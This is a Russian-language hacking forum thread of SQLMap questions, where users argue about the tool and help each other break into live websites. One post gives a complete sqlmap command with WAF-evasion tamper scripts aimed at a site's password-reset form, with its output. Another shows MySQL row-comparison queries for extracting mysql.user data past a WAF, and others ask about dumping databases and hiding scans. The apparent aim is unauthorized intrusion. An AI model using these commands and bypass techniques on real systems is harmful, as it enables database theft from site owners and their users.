Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    90
    Likes Received:
    68
    Reputations:
    3
    Тебе никто ничем не обязан, если ты не желаешь ради себя любимого и своих целей даже разобраться в вопросе или заюзать поиск. Свободен, ответа не получишь, тем более он уже есть. За тебя его поискать? Может взломать за тебя, да и сразу продать и денег на биток (хотя у тебя киви наверное) закинуть? Это так не работает. Если мы тупые-иди к умным. Может поиском научат пользоваться. Хотя лучше головой бы научили канешн
     
  2. Estet

    Estet New Member

    Joined:
    30 Aug 2016
    Messages:
    32
    Likes Received:
    2
    Reputations:
    0
    Я не пойму вам пообщаться не с кем?
    Не нравится вопрос, пройди мимо, а дерзить и ванговать не нужно.
    Еще раз, для особо тугих, повторюсь, тема для этого и создана, тут на половину сообщений можно ответить, пользуйтесь поиском, так как на 99% вопросов, есть где то в гугле ответ!

    ник кстати в точку xDDD
     
  3. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    330
    Reputations:
    6
    ёоу, палегче,

    Нинада пугать дядю апткара СТРАШНЫМЯ словами как то клаудфлейр, УАФ, ТАМПЕР.

    Кароч смотри как происходит сдача проекта. Когда проект сдан и прошли базовые тесты, отдел тестирования запускает скульмап самым первым, к томуж его и покупать не надо, поэтому его запускают даже одиночки разработчики. Запускают и под админом и под юзерами и настройки все перебирают, и не один скульмап а другие доступные и не дорогие, а потом отдают специализирванным фирмам которые проводят продвинутые пентесты, которые проводят анализ исходного кода (автоматизированные и ручной), фаззинг и ручной пентест.

    Апосля сдачи его закрывают уафом или ипсами там всякими, ну и какие у тебя шансы пробить после этого?

    И учти я не говорю ничего про "спалят", работу скульмапа легко замаскировать, я говорю про возможность провести реальный хак на скульмапе, вернее найти уязвимость при помощи оного.

    НО если есть уязвимость, то вытянуть скульмапом канешн проще, особенно блайнд-инъекцию, но если она есть её и руками можно вытянуть вообще без никакова инструмента, вгетом отдним, НО вопрос то в уязвимости! Саммая проблема- как её найти, реализовать хак это уже пустяк и порой даже не интересно.
     
  4. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    90
    Likes Received:
    68
    Reputations:
    3
    Sqlmap это изначально инструмент для автоматизации рутинных действий. Речи не велось по поводу "обнаружить им уязвимость" или проводить полноценный пентест с его помощью (с чем он кстати тоже вполне себе справляется). Исключительно раскерутить, автоматизировать. Для ПОИСКА есть руки, нестандартное мышление и Burp Suite + куча других вспомогательных инструментов.
    0-day уязвимости находятся не так, и не автоматизированными программами, и не анализаторами исходного кода (они просто так же упрощают рутину). Речь идет об ЭКСПЛУАТАЦИИ найденной уязвимости, а не об обнаружении. С чем он и справляется на ура (и что является его основной задачей).
    Одэи находятся каждый день пачками, и даже не одеи, а просто старые известные баги, пропущенные твоими крутыми спецами, разрабами и специализированными фирмами с крутыми пентестами. :D Лол.
    Посмотри за сегодня
    https://hackerone.com/hacktivity?so...tivity_at&filter=type:all&querystring=&page=1
    посмотри на вознаграждения (на моей памяти были выплаты и по 25-50к $), посмотри на корпорации, которые за это платят. А теперь задай сам себе вопрос, какие шансы пробить? =) Исключительно ОГРОМНЫЕ.
    Далее, возможность провести реальный хак на скьюлмапе? Высочайшая. Но не основоваясь на sqlmap'e, а используя его в качестве вспомогательного инструмента, не основного для обнаружения уязвимости, повторюсь, ищут баги не так и не им. Когда уязвимость найдена - остальное дело техники. SQLMAP это не Web Application Security Scanner ! Он не обладает достаточной базой и возможностями для этого, т.к. не его предназначение. Это как обычную проксю на локалхосте полноценным фаерволлом назвать, цирк! Так что ты дядя аптекарь, изначально все попутал, и добил еще вишенкой, перепутав теплое с мягким. :D Повеселил и продолжаешь себя шутом выставлять.
     
    ms13 likes this.
  5. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    Отдельно не получится , через — fresh- session , no-cast или hex + tamper - и все будет
     
  6. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    330
    Reputations:
    6
    Я не понимаю о чем мы спорим?
    Скульмап не нужен, ты я вижу сам признаешь что уязвимость с ним не найти, поэтому он не нужен, а если уязвимость уже найдена, то скульмап УЖЕ не нужен, продавай иё за 50к $ и хлопай себя по яйцам.

    Ты кстати много продал?
     
  7. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    330
    Reputations:
    6
    Да и расскажи нам что это Web Application Security Scanner? Как он работает? и что ты подразумеваешь под "достаточной базой"
     
  8. artkar

    artkar Well-Known Member

    Joined:
    14 Nov 2016
    Messages:
    351
    Likes Received:
    330
    Reputations:
    6
    посмотрел 1 -й Netsparker, второй эксплоит не пейтоне? Где тут скульмап присутствует?
    Ты ссылки проверяешь когда ими тычешь?
     
  9. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    90
    Likes Received:
    68
    Reputations:
    3
    artkar. Ты...эт пиздец...
    Sqlmap просто необходим, а не ненужен. Если у тебя time - based or boolean based иньекция blind, тебе надо вытянуть скажем хэши админов, в хэше 32 символа, на поиск одного верного символа уходит допустим 3-5 запросов к бд. Неверные символы возвращают ответ через 1 секунду, верный через 2. В базе скажем 5 хэшей. У тебя руками неделя уйдет, еще и сидеть с секундомером в руках. А если хэшей 50, 500, 5 000, 50 000 ~ ? :D Скажешь, напишешь скрипт? Пиши еще неделю, замусори логи тестами скрипта, пока уязвимость не закроют и не спалят. А тут есть готовый инструмент, это sqlmap. Человеку это физически невозможно сделать руками. Это один из возможных примеров, из сотен возможных.

    https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools вот тебе список всех актуальных и не очень Web Application Security Scanner's , раз ума не хватает загуглить. Что это и для чего, разбирайся сам. Заметь, среди них нет sqlmap'a. Потому что, бык ты, это не сканер уязвимостей. По ссылке https://vulners.com/search?query=sql injection last 10 days я указал тебе последние найденные уязвимости в "современных" сервисах (проверенных продвинутыми пентестами еще до релиза продукта), которые взламываются с помощью sqlmap. Эксплуатируются им, дебил. А netsparker это адвизор баги блядь, именно в этом случае. Нашли они ее, а эксплуатирует ее sqlmap.

    И да, иди нахуй. Тупой еще и спорить пытается, в чем не соображает нихера. На этом разговор с тобой окончен.
     
    #829 panic.ker, 9 Dec 2018
    Last edited: 9 Dec 2018
    grimnir likes this.
  10. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    284
    Likes Received:
    80
    Reputations:
    1
    what do you advice with this error ?
    upload_2018-12-12_18-46-49.png
    tried many tamper scripts, --hex & --no-cast, but no result

    ++

    sqlmap -u https://site.com/forget_password --data="authenticity_token=CapTbk8wgJtYrsVrLH81X6oGOt43E0oC5El4Ltvu3E3TmQNOwje6ZgmWxDj61XdeyEiCerRlXgJnok2dSCeWSg%3D%3D&commit=Reset%20my%20password&email=*&utf8=%E2%9C%93" --level=5 --risk=3 --random-agent --batch --dbs --tamper=modsecurityversioned,modsecurityzeroversioned --no-cast --fresh-queries

    [18:55:53] [INFO] fetching database names
    [18:55:53] [INFO] fetching number of databases
    [18:55:53] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
    [18:56:05] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    5
    [18:56:07] [INFO] retrieved:
    [18:56:08] [INFO] retrieved:
    [18:56:09] [INFO] retrieved:
    [18:56:10] [INFO] retrieved:
    [18:56:11] [INFO] retrieved:
    [18:56:12] [INFO] falling back to current database
    [18:56:12] [INFO] fetching current database
    [18:56:12] [INFO] retrieved:
    [18:56:13] [CRITICAL] unable to retrieve the database names

    [*] ending @ 18:56:13 /2018-12-12/

    what advice ?
     
    #830 man474019, 12 Dec 2018
    Last edited: 12 Dec 2018
  11. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    284
    Likes Received:
    80
    Reputations:
    1
    Hi all

    when i try to dump dbs sqlmap gives error
    [CRITICAL] unable to retrieve the database names

    I also tested with many tamper scripts and --no-cast, --hex params, but no result

    here is payload - https://pastebin.com/NgeJjsG2
     
  12. Lazy

    Lazy New Member

    Joined:
    19 Jul 2011
    Messages:
    99
    Likes Received:
    2
    Reputations:
    3
    Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
     
    Lazy likes this.
  14. aZohan

    aZohan New Member

    Joined:
    10 Jun 2017
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( /xxxxx.com/scart/ )?
     
  15. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    281
    Likes Received:
    137
    Reputations:
    2
    --url "link.com/search/*" --dbs
     
    aZohan likes this.
  16. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    225
    Likes Received:
    375
    Reputations:
    100
  17. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    ребят подскажите плз почему я в openfire не могу создать компонент или имя домена с символом _
    servercomponent проходит а server_component нет
     
  18. xmp

    xmp Member

    Joined:
    14 Dec 2018
    Messages:
    13
    Likes Received:
    9
    Reputations:
    4
    Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
    (Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
     
    #838 xmp, 25 Dec 2018
    Last edited: 25 Dec 2018
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    808
    Reputations:
    90
    "SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку

    смотря что за запрос, но это в любом случае отдельный скрипт писать придется
    если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
    Code:
    mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
    Empty set (0.00 sec)
    
    mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
    +------+
    | true |
    +------+
    | true |
    +------+
    1 row in set (0.00 sec)
    
    на примере mysql.user, первая колонка в этой таблице "Host"

    Code:
    mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
    Empty set (0.01 sec)
    
    mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
    +------+
    | true |
    +------+
    | true |
    +------+
    1 row in set (0.01 sec)
    
     
    _________________________
    man474019 and xmp like this.
  20. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    394
    Likes Received:
    37
    Reputations:
    1
    Как сливать базу с конца ?
     
Loading...